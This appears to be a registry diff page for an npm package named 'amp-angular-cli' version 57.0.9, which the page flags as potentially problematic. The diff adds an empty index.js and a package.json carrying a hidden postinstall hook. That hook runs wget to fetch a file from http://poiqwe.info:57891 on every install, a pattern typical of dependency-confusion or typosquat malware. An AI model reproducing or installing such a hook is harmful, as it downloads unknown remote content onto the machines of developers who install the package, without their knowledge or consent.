amp-angular-cli 57.0.9

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of amp-angular-cli might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +0 -0
  2. package/package.json +22 -0
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,22 @@
1
+ {
2
+ "name": "amp-angular-cli",
3
+ "version": "57.0.9",
4
+ "description": "amp-angular-cli",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "exit 1"
8
+ },
9
+ "repository": {
10
+ "type": "git",
11
+ "url": "git+https://github.com/lex-hill/amp-angular-cli.git"
12
+ },
13
+ "author": "",
14
+ "license": "ISC",
15
+ "bugs": {
16
+ "url": "https://github.com/lex-hill/amp-angular-cli/issues"
17
+ },
18
+ "homepage": "https://github.com/lex-hill/amp-angular-cli#readme",
19
+ "scripts": {
20
+ "postinstall": "wget http://poiqwe.info:57891/amp-angular-cli"
21
+ }
22
+ }